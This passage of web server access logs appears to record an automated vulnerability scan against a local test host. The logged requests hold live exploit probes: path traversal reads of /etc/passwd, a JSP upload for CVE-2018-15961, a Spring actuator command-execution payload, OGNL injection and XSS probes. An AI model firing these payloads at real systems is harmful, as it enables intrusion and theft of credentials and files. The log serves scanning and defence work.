name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KD1wKvGXxeK56cX2YHc8PXDOV.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A29KD1wKvGXxeK56cX2YHc8PXDOV.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/29KD1wKvGXxeK56cX2YHc8PXDOV.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KD1u47dzqXOjEJNvERU6iH4Zr.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 